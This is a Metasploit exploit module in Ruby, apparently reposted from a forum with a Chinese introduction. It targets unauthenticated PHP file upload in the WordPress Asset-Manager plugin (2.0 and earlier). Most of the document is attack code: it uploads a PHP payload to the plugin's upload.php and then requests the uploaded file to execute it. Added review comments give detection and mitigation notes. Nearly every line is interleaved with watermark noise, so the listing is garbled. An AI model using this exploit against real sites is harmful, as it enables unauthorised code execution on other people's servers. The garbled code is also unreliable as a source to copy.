这个模块利用Metasploit漏洞库中收录的、在WordPress Asset-Manager插件2.0及以下版本中发现的漏洞。该插件允许上传PHP文件：用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
2 {* Y" N- ~5 w* y- e0 E# y/ w/ x. ?& F
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
1 w2 T1 e$ {, d( H) h$ h7 |* E6 Arequire 'msf/core'
( Z+ A5 ~$ L! t& Orequire 'msf/core/exploit/php_exe'
" U$ j( Z" s8 g/ z" S5 G- T `" V
# NOTE(review): this listing is interleaved with non-Ruby noise (forum copy-watermark
# fragments such as "2 b; C: G6 K8 ...") on most lines, so it does not parse as shown.
# The comments below describe only what the legible Ruby tokens show.
2 b; C: G6 K8 m: c, }" Y( `7 zclass Metasploit3 < Msf::Exploit::Remote
M, Z+ Z2 j5 J) m Rank = ExcellentRanking, K1 u2 }8 W! Y3 Y0 z, B& D
  # Mixins: HttpClient (presumably the source of send_request_cgi/send_request_raw and
  # target_uri used below). The second include is garbled in this listing; the file's
  # require 'msf/core/exploit/php_exe' suggests it was Msf::Exploit::PhpEXE, which
  # would supply get_write_exec_payload — TODO confirm against the original module.
) w, e6 ?2 p" a, Y% f, g" { include Msf::Exploit::Remote::HttpClient
; z9 r/ B6 v0 a' F4 _. G* o include Msf::Exploit:hpEXE
4 l- L [( {" \# b8 w: b+ x $ L& _' E6 x' G- t
  # Module metadata: name, description, authors, references (OSVDB 82653, BID 53809,
  # EDB 18993), a PHP payload with NUL as the only bad character, two targets
  # (generic PHP / Linux x86, default 0), disclosure date May 26 2012, and the
  # TARGETURI option (default '/wordpress').
def initialize(info = {})/ [5 Q9 }" C0 c7 p6 k( i$ T6 Y
super(update_info(info,
( h3 f$ D7 A- X, ] 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',2 x$ X# m& q# O T( p
'Description' => %q{ G0 K7 R% Y3 j5 u: D0 U
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress( _: u! [5 b/ c: A! M: E6 O
plugin. By abusing the upload.php file, a malicious user can upload a file to a
% `2 _9 H' W9 u( G! I* v7 n temp directory without authentication, which results in arbitrary code execution.
: n8 ~! v, U) h& Y1 |4 V$ q. f }, u9 `; u8 x S$ X
'Author' =>( ]/ T/ E4 Z- Y' j. W5 U
[4 z" v4 D" N$ p
'Sammy FORGIT', # initial discovery* L, w' d$ {: ]/ C3 ?) R
'James Fitts <fitts.james[at]gmail.com>' # metasploit module( R6 u$ z7 S; D0 u) a0 z% t7 m0 @
],
, A, Z! i3 w( C% A! \. \" k 'License' => MSF_LICENSE,
% M, }! @1 t9 a; \ 'References' =>
5 a T4 M0 t' v1 H2 D! I [- Y/ U: S" N3 o) h
[ 'OSVDB', '82653' ],* A7 N7 v( b( u [0 ]
[ 'BID', '53809' ],% I! ^6 w9 V1 [- a& s* h
[ 'EDB', '18993' ],1 ~1 ]' K$ H( m# D2 \8 z# d1 M# `
[ 'URL', 'http:// www.myhack58.com /' ]
# O6 L4 v* q) x1 U" ? ],* |) u& C% k: l9 u
'Payload' =>
% F) _: i" t0 g, Z {
3 O# Y: `9 q* [9 |, K 'BadChars' => "\x00",8 _6 H1 U5 [' F' P
},
, m: A7 k0 Q) Z0 p$ l 'Platform' => 'php',6 u6 M9 O- ]! ^, Z
'Arch' => ARCH_PHP,
6 r$ H! I% Y5 k1 ?' `% I( {( o3 n 'Targets' =>
# B, d6 I4 [- ]# O+ H [
4 \3 a! ] ]* i5 y [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
8 V0 I: X. U# K4 ? [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
( J9 X5 z9 o* d ],$ k/ B+ ?0 a; w, V9 d
'DefaultTarget' => 0,9 X4 Q( u7 C) I' n- D B: F
'DisclosureDate' => 'May 26 2012'))
$ m# `6 m% k+ e$ A ; S: ^/ E: h2 l+ A
    # TARGETURI is the WordPress base path; it is normalized to a trailing '/' in exploit.
register_options(+ t+ {5 M: w" w
[
3 ?. l0 w0 q; ?- x7 z/ g OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])4 m$ A1 ]7 \. ~: ~: g$ p1 x
], self.class). k8 R4 n# ~3 {: n
end
1 S1 H6 M" \( ^, D0 } 3 X2 Y5 z8 J2 R) J ~- K, D
  # Exploit flow as visible below: (1) a multipart POST carrying a PHP file in the
  # form field "Filedata" to wp-content/plugins/asset-manager/upload.php; (2) a GET
  # of wp-content/uploads/assets/temp/<random>.php to run the uploaded file.
  # Defender notes: both paths are visible in web-server access logs, so an
  # unauthenticated POST to the plugin's upload.php followed by a GET of a .php file
  # under uploads/assets/temp/ is a concrete detection signature. The root cause is
  # the upload endpoint accepting arbitrary file types without authentication;
  # upgrading or removing the plugin and denying script execution under
  # wp-content/uploads both close this path.
def exploit8 L) I8 B* J) _7 U
uri = target_uri.path
    # Ensure a trailing slash so the relative paths below concatenate cleanly.
1 d) i, K1 P3 A" X% X% U uri << '/' if uri[-1,1] != '/'
( g% r @1 i) Y9 ~) { peer = "#{rhost}:#{rport}"
    # Random 5-letter basename; it is also the marker checked in the upload response.
# O( D$ {8 I: m+ ?0 [ payload_name = "#{rand_text_alpha(5)}.php"! J4 t5 L# W" P; x; D6 }
    # :unlink_self => true presumably makes the PHP stub remove itself after it runs
    # — TODO confirm against the PhpEXE mixin.
php_payload = get_write_exec_payload(:unlink_self=>true)
- R4 g# n/ B; _9 Z. m
    # Build the multipart body; the part is named "Filedata" and carries payload_name
    # as its filename.
( @5 x7 Y3 g m data = Rex::MIME::Message.new3 U+ { r6 Z, s- R: V' z5 o
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")) P8 X( R% r8 u, D+ a2 F
    # Strip the CRLF that precedes the first "--_Part_" boundary so the body starts
    # directly at the boundary line.
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
6 }0 i' ~+ B; t; P7 h, V- Y6 g- O
6 l( t K7 s7 J0 R8 u5 S2 H) o print_status("#{peer} - Uploading payload #{payload_name}"): D, B/ _$ U4 B! A) L! } \& ?) S8 ?
res = send_request_cgi({
: t1 o0 J. v+ I2 F* u3 Y 'method' => 'POST',6 p+ A& M& P' x
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
/ r( {" A6 C( F3 V+ p 'ctype' => "multipart/form-data; boundary=#{data.bound}",6 K# _2 {5 |; d6 v
'data' => post_data) ?0 K( }$ C5 }& d$ C- \3 v
})$ P/ G. E# z3 n! E9 a! X
    # Upload success criterion: a reply, status 200, and the filename echoed in the body.
: R* T1 y* X8 {; h/ M( j& d if not res or res.code != 200 or res.body !~ /#{payload_name}/
) k9 S0 N8 x- O2 O+ b/ I7 r; D" R fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; S9 ^7 a7 V( j5 qend
s1 A+ ]5 v+ P+ L- p1 e( ~% g: K 9 ~' F9 q# p' X5 H( v
print_status("#{peer} - Executing payload #{payload_name}")5 ?, p% G8 c) {6 G; Z8 ]
res = send_request_raw({2 x3 B/ v3 ~2 A3 |5 h% [0 b+ Y
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
: ~8 w$ c" I! P/ @. E/ s ? 'method' => 'GET'- @! p$ q$ {" j! Y3 o
})" T' a/ c, ~/ t, {5 b& s3 r
6 M- Y) I# y; _- e
    # Unlike the upload step, only a non-200 reply is treated as failure here; a nil
    # res (no HTTP reply at all) falls through without fail_with.
if res and res.code != 200
% L' D3 U- Z/ Q) ]- i) W fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")+ `! l. d6 L& C; L! K: Z8 u7 e. i
end
- [3 K, \! J1 c9 ]; p! `2 z& d end7 `/ {4 v: P8 F c; r0 {; K
end
) D- Q9 s% p' r' k, N" C" S |